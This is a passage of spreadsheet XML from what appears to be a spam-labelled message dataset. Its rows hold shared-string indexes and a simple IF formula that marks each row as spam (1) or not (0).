    <row r="5403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5403" t="s">
        <v>10311</v>
      </c>
      <c r="B5403" t="s">
        <v>5294</v>
      </c>
      <c r="C5403" s="1">
        <f>IF(B5403="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5404" t="s">
        <v>10312</v>
      </c>
      <c r="B5404" t="s">
        <v>5294</v>
      </c>
      <c r="C5404" s="1">
        <f>IF(B5404="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5405" t="s">
        <v>10313</v>
      </c>
      <c r="B5405" t="s">
        <v>5294</v>
      </c>
      <c r="C5405" s="1">
        <f>IF(B5405="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5406" t="s">
        <v>10314</v>
      </c>
      <c r="B5406" t="s">
        <v>5294</v>
      </c>
      <c r="C5406" s="1">
        <f>IF(B5406="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5407" t="s">
        <v>10315</v>
      </c>
      <c r="B5407" t="s">
        <v>5294</v>
      </c>
      <c r="C5407" s="1">
        <f>IF(B5407="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5408" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5408" t="s">
        <v>10316</v>
      </c>
      <c r="B5408" t="s">
        <v>5294</v>
      </c>
      <c r="C5408" s="1">
        <f>IF(B5408="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5409" t="s">
        <v>10317</v>
      </c>
      <c r="B5409" t="s">
        <v>5294</v>
      </c>
      <c r="C5409" s="1">
        <f>IF(B5409="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5410" t="s">
        <v>10318</v>
      </c>
      <c r="B5410" t="s">
        <v>5294</v>
      </c>
      <c r="C5410" s="1">
        <f>IF(B5410="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5411" t="s">
        <v>10319</v>
      </c>
      <c r="B5411" t="s">
        <v>5294</v>
      </c>
      <c r="C5411" s="1">
        <f>IF(B5411="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5412" t="s">
        <v>10320</v>
      </c>
      <c r="B5412" t="s">
        <v>5294</v>
      </c>
      <c r="C5412" s="1">
        <f>IF(B5412="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5413" t="s">
        <v>10321</v>
      </c>
      <c r="B5413" t="s">
        <v>5294</v>
      </c>
      <c r="C5413" s="1">
        <f>IF(B5413="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5414" t="s">
        <v>10322</v>
      </c>
      <c r="B5414" t="s">
        <v>5294</v>
      </c>
      <c r="C5414" s="1">
        <f>IF(B5414="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5415" t="s">
        <v>10323</v>
      </c>
      <c r="B5415" t="s">
        <v>5294</v>
      </c>
      <c r="C5415" s="1">
        <f>IF(B5415="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5416" t="s">
        <v>10324</v>
      </c>
      <c r="B5416" t="s">
        <v>5294</v>
      </c>
      <c r="C5416" s="1">
        <f>IF(B5416="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5417" t="s">
        <v>10325</v>
      </c>
      <c r="B5417" t="s">
        <v>5294</v>
      </c>
      <c r="C5417" s="1">
        <f>IF(B5417="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5418" t="s">
        <v>10326</v>
      </c>
      <c r="B5418" t="s">
        <v>5294</v>
      </c>
      <c r="C5418" s="1">
        <f>IF(B5418="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5419" t="s">
        <v>10327</v>
      </c>
      <c r="B5419" t="s">
        <v>5294</v>
      </c>
      <c r="C5419" s="1">
        <f>IF(B5419="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5420" t="s">
        <v>10328</v>
      </c>
      <c r="B5420" t="s">
        <v>5294</v>
      </c>
      <c r="C5420" s="1">
        <f>IF(B5420="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5421" t="s">
        <v>10329</v>
      </c>
      <c r="B5421" t="s">
        <v>5294</v>
      </c>
      <c r="C5421" s="1">
        <f>IF(B5421="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5422" t="s">
        <v>10330</v>
      </c>
      <c r="B5422" t="s">
        <v>5294</v>
      </c>
      <c r="C5422" s="1">
        <f>IF(B5422="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5423" t="s">
        <v>10331</v>
      </c>
      <c r="B5423" t="s">
        <v>5294</v>
      </c>
      <c r="C5423" s="1">
        <f>IF(B5423="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5424" t="s">
        <v>10332</v>
      </c>
      <c r="B5424" t="s">
        <v>5294</v>
      </c>
      <c r="C5424" s="1">
        <f>IF(B5424="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5425" t="s">
        <v>5376</v>
      </c>
      <c r="B5425" t="s">
        <v>5294</v>
      </c>
      <c r="C5425" s="1">
        <f>IF(B5425="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5426" t="s">
        <v>10333</v>
      </c>
      <c r="B5426" t="s">
        <v>5294</v>
      </c>
      <c r="C5426" s="1">
        <f>IF(B5426="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5427" t="s">
        <v>6463</v>
      </c>
      <c r="B5427" t="s">
        <v>5294</v>
      </c>
      <c r="C5427" s="1">
        <f>IF(B5427="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5428" t="s">
        <v>10334</v>
      </c>
      <c r="B5428" t="s">
        <v>5294</v>
      </c>
      <c r="C5428" s="1">
        <f>IF(B5428="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5429" t="s">
        <v>10335</v>
      </c>
      <c r="B5429" t="s">
        <v>5297</v>
      </c>
      <c r="C5429" s="1">
        <f>IF(B5429="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5430" t="s">
        <v>10336</v>
      </c>
      <c r="B5430" t="s">
        <v>5294</v>
      </c>
      <c r="C5430" s="1">
        <f>IF(B5430="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5431" t="s">
        <v>10337</v>
      </c>
      <c r="B5431" t="s">
        <v>5294</v>
      </c>
      <c r="C5431" s="1">
        <f>IF(B5431="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5432" t="s">
        <v>10338</v>
      </c>
      <c r="B5432" t="s">
        <v>5294</v>
      </c>
      <c r="C5432" s="1">
        <f>IF(B5432="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5433" t="s">
        <v>10339</v>
      </c>
      <c r="B5433" t="s">
        <v>5294</v>
      </c>
      <c r="C5433" s="1">
        <f>IF(B5433="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5434" t="s">
        <v>10340</v>
      </c>
      <c r="B5434" t="s">
        <v>5294</v>
      </c>
      <c r="C5434" s="1">
        <f>IF(B5434="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5435" t="s">
        <v>10341</v>
      </c>
      <c r="B5435" t="s">
        <v>5294</v>
      </c>
      <c r="C5435" s="1">
        <f>IF(B5435="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5436" t="s">
        <v>10342</v>
      </c>
      <c r="B5436" t="s">
        <v>5294</v>
      </c>
      <c r="C5436" s="1">
        <f>IF(B5436="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5437" t="s">
        <v>10343</v>
      </c>
      <c r="B5437" t="s">
        <v>5294</v>
      </c>
      <c r="C5437" s="1">
        <f>IF(B5437="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5438" t="s">
        <v>10344</v>
      </c>
      <c r="B5438" t="s">
        <v>5294</v>
      </c>
      <c r="C5438" s="1">
        <f>IF(B5438="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5439" t="s">
        <v>10345</v>
      </c>
      <c r="B5439" t="s">
        <v>5294</v>
      </c>
      <c r="C5439" s="1">
        <f>IF(B5439="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5440" t="s">
        <v>10346</v>
      </c>
      <c r="B5440" t="s">
        <v>5294</v>
      </c>
      <c r="C5440" s="1">
        <f>IF(B5440="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5441" t="s">
        <v>10347</v>
      </c>
      <c r="B5441" t="s">
        <v>5294</v>
      </c>
      <c r="C5441" s="1">
        <f>IF(B5441="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5442" t="s">
        <v>10348</v>
      </c>
      <c r="B5442" t="s">
        <v>5294</v>
      </c>
      <c r="C5442" s="1">
        <f>IF(B5442="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5443" t="s">
        <v>10349</v>
      </c>
      <c r="B5443" t="s">
        <v>5294</v>
      </c>
      <c r="C5443" s="1">
        <f>IF(B5443="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5444" t="s">
        <v>10350</v>
      </c>
      <c r="B5444" t="s">
        <v>5294</v>
      </c>
      <c r="C5444" s="1">
        <f>IF(B5444="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5445" t="s">
        <v>10351</v>
      </c>
      <c r="B5445" t="s">
        <v>5297</v>
      </c>
      <c r="C5445" s="1">
        <f>IF(B5445="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5446" t="s">
        <v>10352</v>
      </c>
      <c r="B5446" t="s">
        <v>5294</v>
      </c>
      <c r="C5446" s="1">
        <f>IF(B5446="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5447" t="s">
        <v>10353</v>
      </c>
      <c r="B5447" t="s">
        <v>5294</v>
      </c>
      <c r="C5447" s="1">
        <f>IF(B5447="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5448" t="s">
        <v>10354</v>
      </c>
      <c r="B5448" t="s">
        <v>5294</v>
      </c>
      <c r="C5448" s="1">
        <f>IF(B5448="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5449" t="s">
        <v>10355</v>
      </c>
      <c r="B5449" t="s">
        <v>5294</v>
      </c>
      <c r="C5449" s="1">
        <f>IF(B5449="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5450" t="s">
        <v>10356</v>
      </c>
      <c r="B5450" t="s">
        <v>5294</v>
      </c>
      <c r="C5450" s="1">
        <f>IF(B5450="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5451" t="s">
        <v>10357</v>
      </c>
      <c r="B5451" t="s">
        <v>5297</v>
      </c>
      <c r="C5451" s="1">
        <f>IF(B5451="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5452" t="s">
        <v>10358</v>
      </c>
      <c r="B5452" t="s">
        <v>5294</v>
      </c>
      <c r="C5452" s="1">
        <f>IF(B5452="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5453" t="s">
        <v>10359</v>
      </c>
      <c r="B5453" t="s">
        <v>5294</v>
      </c>
      <c r="C5453" s="1">
        <f>IF(B5453="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5454" t="s">
        <v>10360</v>
      </c>
      <c r="B5454" t="s">
        <v>5294</v>
      </c>
      <c r="C5454" s="1">
        <f>IF(B5454="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5455" t="s">
        <v>10361</v>
      </c>
      <c r="B5455" t="s">
        <v>5294</v>
      </c>
      <c r="C5455" s="1">
        <f>IF(B5455="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5456" t="s">
        <v>10362</v>
      </c>
      <c r="B5456" t="s">
        <v>5294</v>
      </c>
      <c r="C5456" s="1">
        <f>IF(B5456="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5457" t="s">
        <v>10363</v>
      </c>
      <c r="B5457" t="s">
        <v>5294</v>
      </c>
      <c r="C5457" s="1">
        <f>IF(B5457="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5458" t="s">
        <v>10364</v>
      </c>
      <c r="B5458" t="s">
        <v>5297</v>
      </c>
      <c r="C5458" s="1">
        <f>IF(B5458="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5459" t="s">
        <v>7024</v>
      </c>
      <c r="B5459" t="s">
        <v>5294</v>
      </c>
      <c r="C5459" s="1">
        <f>IF(B5459="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5460" t="s">
        <v>5376</v>
      </c>
      <c r="B5460" t="s">
        <v>5294</v>
      </c>
      <c r="C5460" s="1">
        <f>IF(B5460="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5461" t="s">
        <v>10365</v>
      </c>
      <c r="B5461" t="s">
        <v>5294</v>
      </c>
      <c r="C5461" s="1">
        <f>IF(B5461="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5462" t="s">
        <v>5610</v>
      </c>
      <c r="B5462" t="s">
        <v>5297</v>
      </c>
      <c r="C5462" s="1">
        <f>IF(B5462="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5463" t="s">
        <v>10366</v>
      </c>
      <c r="B5463" t="s">
        <v>5294</v>
      </c>
      <c r="C5463" s="1">
        <f>IF(B5463="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5464" t="s">
        <v>10367</v>
      </c>
      <c r="B5464" t="s">
        <v>5297</v>
      </c>
      <c r="C5464" s="1">
        <f>IF(B5464="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5465" t="s">
        <v>10368</v>
      </c>
      <c r="B5465" t="s">
        <v>5294</v>
      </c>
      <c r="C5465" s="1">
        <f>IF(B5465="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5466" t="s">
        <v>10369</v>
      </c>
      <c r="B5466" t="s">
        <v>5294</v>
      </c>
      <c r="C5466" s="1">
        <f>IF(B5466="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5467" t="s">
        <v>10370</v>
      </c>
      <c r="B5467" t="s">
        <v>5294</v>
      </c>
      <c r="C5467" s="1">
        <f>IF(B5467="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5468" t="s">
        <v>10371</v>
      </c>
      <c r="B5468" t="s">
        <v>5297</v>
      </c>
      <c r="C5468" s="1">
        <f>IF(B5468="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5469" t="s">
        <v>10092</v>
      </c>
      <c r="B5469" t="s">
        <v>5297</v>
      </c>
      <c r="C5469" s="1">
        <f>IF(B5469="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5470" t="s">
        <v>10372</v>
      </c>
      <c r="B5470" t="s">
        <v>5297</v>
      </c>
      <c r="C5470" s="1">
        <f>IF(B5470="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5471" t="s">
        <v>7527</v>
      </c>
      <c r="B5471" t="s">
        <v>5294</v>
      </c>
      <c r="C5471" s="1">
        <f>IF(B5471="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5472" t="s">
        <v>10373</v>
      </c>
      <c r="B5472" t="s">
        <v>5294</v>
      </c>
      <c r="C5472" s="1">
        <f>IF(B5472="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5473" t="s">
        <v>5552</v>
      </c>
      <c r="B5473" t="s">
        <v>5294</v>
      </c>
      <c r="C5473" s="1">
        <f>IF(B5473="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5474" t="s">
        <v>10374</v>
      </c>
      <c r="B5474" t="s">
        <v>5294</v>
      </c>
      <c r="C5474" s="1">
        <f>IF(B5474="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5475" t="s">
        <v>10375</v>
      </c>
      <c r="B5475" t="s">
        <v>5294</v>
      </c>
      <c r="C5475" s="1">
        <f>IF(B5475="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5476" t="s">
        <v>10376</v>
      </c>
      <c r="B5476" t="s">
        <v>5294</v>
      </c>
      <c r="C5476" s="1">
        <f>IF(B5476="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5477" t="s">
        <v>10377</v>
      </c>
      <c r="B5477" t="s">
        <v>5294</v>
      </c>
      <c r="C5477" s="1">
        <f>IF(B5477="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5478" t="s">
        <v>10378</v>
      </c>
      <c r="B5478" t="s">
        <v>5294</v>
      </c>
      <c r="C5478" s="1">
        <f>IF(B5478="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5479" t="s">
        <v>5819</v>
      </c>
      <c r="B5479" t="s">
        <v>5294</v>
      </c>
      <c r="C5479" s="1">
        <f>IF(B5479="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5480" t="s">
        <v>10379</v>
      </c>
      <c r="B5480" t="s">
        <v>5294</v>
      </c>
      <c r="C5480" s="1">
        <f>IF(B5480="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5481" t="s">
        <v>10380</v>
      </c>
      <c r="B5481" t="s">
        <v>5294</v>
      </c>
      <c r="C5481" s="1">
        <f>IF(B5481="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5482" t="s">
        <v>10381</v>
      </c>
      <c r="B5482" t="s">
        <v>5294</v>
      </c>
      <c r="C5482" s="1">
        <f>IF(B5482="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5483" t="s">
        <v>10382</v>
      </c>
      <c r="B5483" t="s">
        <v>5294</v>
      </c>
      <c r="C5483" s="1">
        <f>IF(B5483="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5484" t="s">
        <v>10383</v>
      </c>
      <c r="B5484" t="s">
        <v>5297</v>
      </c>
      <c r="C5484" s="1">
        <f>IF(B5484="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5485" t="s">
        <v>10384</v>
      </c>
      <c r="B5485" t="s">
        <v>5294</v>
      </c>
      <c r="C5485" s="1">
        <f>IF(B5485="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5486" t="s">
        <v>10385</v>
      </c>
      <c r="B5486" t="s">
        <v>5294</v>
      </c>
      <c r="C5486" s="1">
        <f>IF(B5486="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5487" t="s">
        <v>10386</v>
      </c>
      <c r="B5487" t="s">
        <v>5294</v>
      </c>
      <c r="C5487" s="1">
        <f>IF(B5487="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5488" t="s">
        <v>10387</v>
      </c>
      <c r="B5488" t="s">
        <v>5294</v>
      </c>
      <c r="C5488" s="1">
        <f>IF(B5488="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5489" t="s">
        <v>10388</v>
      </c>
      <c r="B5489" t="s">
        <v>5297</v>
      </c>
      <c r="C5489" s="1">
        <f>IF(B5489="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5490" t="s">
        <v>6427</v>
      </c>
      <c r="B5490" t="s">
        <v>5294</v>
      </c>
      <c r="C5490" s="1">
        <f>IF(B5490="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5491" t="s">
        <v>10389</v>
      </c>
      <c r="B5491" t="s">
        <v>5294</v>
      </c>
      <c r="C5491" s="1">
        <f>IF(B5491="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5492" t="s">
        <v>6427</v>
      </c>
      <c r="B5492" t="s">
        <v>5294</v>
      </c>
      <c r="C5492" s="1">
        <f>IF(B5492="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5493" t="s">
        <v>10390</v>
      </c>
      <c r="B5493" t="s">
        <v>5294</v>
      </c>
      <c r="C5493" s="1">
        <f>IF(B5493="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5494" t="s">
        <v>10391</v>
      </c>
      <c r="B5494" t="s">
        <v>5297</v>
      </c>
      <c r="C5494" s="1">
        <f>IF(B5494="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5495" t="s">
        <v>10392</v>
      </c>
      <c r="B5495" t="s">
        <v>5294</v>
      </c>
      <c r="C5495" s="1">
        <f>IF(B5495="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5496" t="s">
        <v>10393</v>
      </c>
      <c r="B5496" t="s">
        <v>5294</v>
      </c>
      <c r="C5496" s="1">
        <f>IF(B5496="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5497" t="s">
        <v>10394</v>
      </c>
      <c r="B5497" t="s">
        <v>5294</v>
      </c>
      <c r="C5497" s="1">
        <f>IF(B5497="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5498" t="s">
        <v>10395</v>
      </c>
      <c r="B5498" t="s">
        <v>5294</v>
      </c>
      <c r="C5498" s="1">
        <f>IF(B5498="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5499" t="s">
        <v>9503</v>
      </c>
      <c r="B5499" t="s">
        <v>5297</v>
      </c>
      <c r="C5499" s="1">
        <f>IF(B5499="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5500" t="s">
        <v>10396</v>
      </c>
      <c r="B5500" t="s">
        <v>5294</v>
      </c>
      <c r="C5500" s="1">
        <f>IF(B5500="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5501" t="s">
        <v>10397</v>
      </c>
      <c r="B5501" t="s">
        <v>5294</v>
      </c>
      <c r="C5501" s="1">
        <f>IF(B5501="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5502" t="s">
        <v>10398</v>
      </c>
      <c r="B5502" t="s">
        <v>5294</v>
      </c>
      <c r="C5502" s="1">
        <f>IF(B5502="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5503" t="s">
        <v>10399</v>
      </c>
      <c r="B5503" t="s">
        <v>5297</v>
      </c>
      <c r="C5503" s="1">
        <f>IF(B5503="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5504" t="s">
        <v>10400</v>
      </c>
      <c r="B5504" t="s">
        <v>5294</v>
      </c>
      <c r="C5504" s="1">
        <f>IF(B5504="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5505" t="s">
        <v>10401</v>
      </c>
      <c r="B5505" t="s">
        <v>5294</v>
      </c>
      <c r="C5505" s="1">
        <f>IF(B5505="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5506" t="s">
        <v>10402</v>
      </c>
      <c r="B5506" t="s">
        <v>5294</v>
      </c>
      <c r="C5506" s="1">
        <f>IF(B5506="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
